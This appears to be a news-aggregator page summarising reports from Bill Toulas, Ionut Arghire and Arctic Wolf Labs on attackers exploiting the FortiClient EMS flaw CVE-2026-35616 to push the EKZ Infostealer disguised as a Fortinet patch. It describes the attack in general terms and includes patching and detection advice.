Attackers are using a critical Fortinet server flaw to send malware to computers managed by FortiClient Endpoint Management Server (EMS). The issue, CVE-2026-35616, is a remote code execution bug in FortiClient EMS that can be exploited without authentication via crafted requests; Fortinet patched it in April after warning it had already been used as a zero-day, and Arctic Wolf now says fresh attacks are abusing EMS scripting workflows to deploy EKZ Infostealer disguised as a Fortinet patch.
Why it matters: This can turn a central management server into a way to infect every device it manages, putting passwords, browser cookies, and other sensitive data at risk. Organizations running FortiClient EMS should patch immediately, check for suspicious PowerShell/script activity, and investigate whether fake update jobs were pushed to endpoints.
Bill Toulas
2026.05.28
99% relevant
This article is the same underlying event and adds specific tradecraft from Arctic Wolf: attackers abused FortiClient EMS endpoint APIs and VPN scripting workflows to deliver the EKZ infostealer, used fortitray.exe and PowerShell to fetch a fake Fortinet update, and left detectable log artifacts such as 'Certificate not found in request header.'
Ionut Arghire
2026.05.28
100% relevant
This article establishes a distinct story by adding concrete post-patch exploitation details for FortiClient EMS CVE-2026-35616, including the malware payload, delivery method through EMS-managed VPN scripting, and the risk of compromise spreading to all managed endpoints.
Arctic Wolf Labs
2026.05.27
97% relevant
This source directly updates the same event by naming the payload as EKZ Infostealer, describing how it was disguised as a Fortinet patch, explaining abuse of EMS policy and remote access profile changes to run malicious PowerShell across managed endpoints, and providing detection details including EMS log artifacts and Tor-linked follow-on activity.
Arctic Wolf Labs
2026.05.27
99% relevant
This directly updates the same event by adding victim-observed tradecraft: attackers exploited CVE-2026-35616 in FortiClient EMS, modified EMS configuration, and delivered a fake Fortinet patch that installed the EKZ Infostealer on managed endpoints via PowerShell. It also adds detection clues from EMS logs and notes follow-on activity from Tor exit nodes.
← Back to all stories